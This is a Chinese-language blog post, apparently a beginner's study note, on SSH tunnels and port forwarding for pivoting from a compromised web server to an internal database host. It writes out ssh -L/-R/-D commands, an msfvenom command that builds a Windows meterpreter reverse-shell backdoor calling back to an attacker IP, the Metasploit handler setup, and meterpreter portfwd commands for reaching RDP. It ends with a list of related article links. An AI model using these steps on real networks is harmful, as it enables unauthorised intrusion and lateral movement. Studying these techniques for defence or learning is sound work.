SSH隧道技术及端口映射与转发
拓扑图
假定攻击机已拿下web服务器且无法访问数据库服务器,以下未说明的ssh命令均在web服务器上完成
ssh正向连接
ssh -CNfL 0.0.0.0:5555:10.10.10.124:80 web@127.0.0.1
正向代理完成后,可以在攻击机访问192.168.1.100:5555即可获取到10.10.10.124的80端口部署的内容。
ssh反向连接
ssh -qTfnN -R port:host:hostport remote ip
ssh -qTfnN -R 2222:127.0.0.1:22 root@192.168.0.200
攻击机:ssh -p 2222 web@127.0.0.1curl http://10.10.10.124
web服务器向攻击机完成反向连接后,攻击机ssh -p修改22端口为2222端口连接到web服务器使用curl命令即可访问10.10.10.124
sockets代理
ssh -qTfnN -D 10000 root@192.168.0.200
之后浏览器走192.168.0.200:10000的代理即可
端口映射
metasploit生成后门:
msfvenom -p windows/meterpreter/reverse_tcp|host=192.168.0.200|port=12345 -f exe >/var/www/html/aa.exe
msf监听模块
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.200
set lport 12345
exploit
在目标机上运行后面程序,攻击机上监听就会返回meterpreter会话
攻击机:portfwd flush (清除下记录)portfwd add -L 192.168.0.200 -l 2022 -p 80 -r 10.10.10.124
成功映射之后,访问192.168.0.200:2022即可看到10.10.10.124:80端口部署的内容
端口转发
攻击机:portfwd add -l 5555 -p 3389 -r 192.168.1.100rdesktop 127.0.0.1:5555
接着在meterpreter会话实现转发目标的3389端口,在攻击机本地访问127.0.0.1:5555端口即可实现远程桌面登录,进而访问10.10.10.124
开始学习内网很多地方不是很明白,若有错误还望师傅们指正。
SSH隧道技术及端口映射与转发相关推荐
- 老戚的黑科技之SSH隧道技术
隧道顾名思义让不通的地方变通.SSH隧道技术也是同样的道理,借用SSH这个工具,通过SSHClient和SSHServer之间建立一条TCP通道,从而打通二台设备,于此同时分别监听各自的一个端口号,如 ...
- 公网与私网的区别 ?如何进行通信?(NAT技术,端口映射技术,)
目录 一, 公网与私网介绍两者间的联系 二,公网ip与私有ip的区别 三,私有网络如何访问公有网络? 1,端口映射技术 2,nat技术 (网络地址转换 ) 五,VPN技术 六,总结概述 一, 公网与私 ...
- SSH隧道技术----端口转发,socket代理
原文的原始出处不详,本文也是在复制引用了某篇转载,并做了必要的整理与编辑. 本文的受众 如果你遇到了以下问题,那么你应该阅读这篇文章 我听说过这种技术,我对它很感兴趣 我想在家里访问我在公司的机器(写 ...
- 局域网内配置服务器方法--p2p技术、端口映射、网络域名
最近公司要求在内网搭建服务器提供给外网使用,最主要就是在出差时能过方便的提供数据查看服务.局域网里面的PC机的IP地址只是用来内部地址区分的(内网IP),一般都为192.168.1.XX,当要和外网建 ...
- NAT技术与端口映射使用方法
静态NAT: 本地地址与全局地址(公网)之间一对一映射,即一台主机对应一个公网IP. #ip nat inside source static 192.168.1.10 188.188.90.18 ...
- windwos 端口转发、端口映射(PassPort Control)
windwos 端口转发.端口映射 有的vpn只能在windows上运行,所以使用mac时,需要安装虚拟机,在虚拟机中运行vpn然后进行开发. 这时,如果想要在mac端进行开发,则需要虚拟机windw ...
- SSH隧道 / SSH穿透
在开发微信公众号或小程序的时候,由于微信平台规则的限制,部分接口需要通过线上域名才能正常访问.但我们一般都会在本地开发,因为这能快速的看到源码修改后的运行结果.但当涉及到需要调用微信接口时,由于不和你 ...
- 建立稳定安全的SSH隧道
本文将教你如何通过 SSH 隧道把本地服务映射到外网,以方便调试,通常把这种方法叫内网穿透. 目的 把运行在本地开发机上的 SSH 服务(或其他服务如HTTP等)映射到外网,让全世界都能通过外网 IP ...
- 关闭ssh隧道的几种“优雅”方式
关闭/断开 ssh隧道转发(ssh连接)的几种方式 网络环境 方法一(通过文件进行通道管理,本质上文件为socket文件) 方法二(通过进程找pid杀掉进程) 方法三(只在监听端口的服务器上有效,通过 ...
最新文章
- d3.js 旋转图形_【IOS游戏推荐】百万畅销游戏刚从STEAM移植至IOS平台,在极端地形中冒险前进!——旋转轮胎:泥泞奔驰...
- VMware vSphere 6简单部署---VCSA( vCenter Server Appliance)部署
- Android开发之如何在debug模式下打出release正式包
- java中rank函数_sql rank()函数
- ngnix 作用(通俗易懂)【转载】
- 漫话:什么是云计算?
- 大一计算机专业,大一计算机专业学生
- 最完整UI库Kendo UI发布R3 2018|附下载
- 【转】一个小妙招能让你在服装上省下好多rmb
- 芝麻HTTP:TensorFlow LSTM MNIST分类
- 小米手机通过USB连接电脑,共享使用电脑的网络
- UVA 12304 /// 圆的综合题 圆的模板
- 易基因|ChIP-seq分析方法:实用的工作流程和高级应用
- 自动快捷使用数据采集器采集某网站数据---后裔采集器
- Word删除空白页方法汇总
- ExtJS初级教程之ExtJS Tree(三)
- 芜湖小学计算机能力测试20111年 c语言,2011年计算机二级考试C语言十套上机题(1)...
- 【Microsoft Azure 的1024种玩法】四. 利用Azure Virtual machines 打造个人专属云盘,速度吊打某云盘...
- 飞翔的小鸟游戏基于arm开发板制作
- 无线 配置ldap 认证服务器,在无线局域网控制器wlcs上使用ldap的web认证配置示例-cisco.pdf...
热门文章
- 视频教程-SQL语句从入门到精通迅速提升篇视频课程(Oracle零基础版)-Oracle
- 开源阅读书源_超强小说阅读软件
- lang:C++自定义异常类——用来处理自制编程语言的异常信息
- GuruDigger - 我们帮助靠谱的互联网产品找到志同道合的创业合作工程师。
- 华为od 2023 | 什么是华为od,od 薪资待遇,od机试题清单
- AutoCAD下载的具体步骤:个人用户AutoCAD下载安装指南
- 大疆笔试题目总结--参考历届试卷
- 【自学前端】我只学这些够吗?好难
- Inno Setup的下载、安装、中文向导文件等
- 【Win10 UWP】URI Scheme(一):Windows Store协议的解析和使用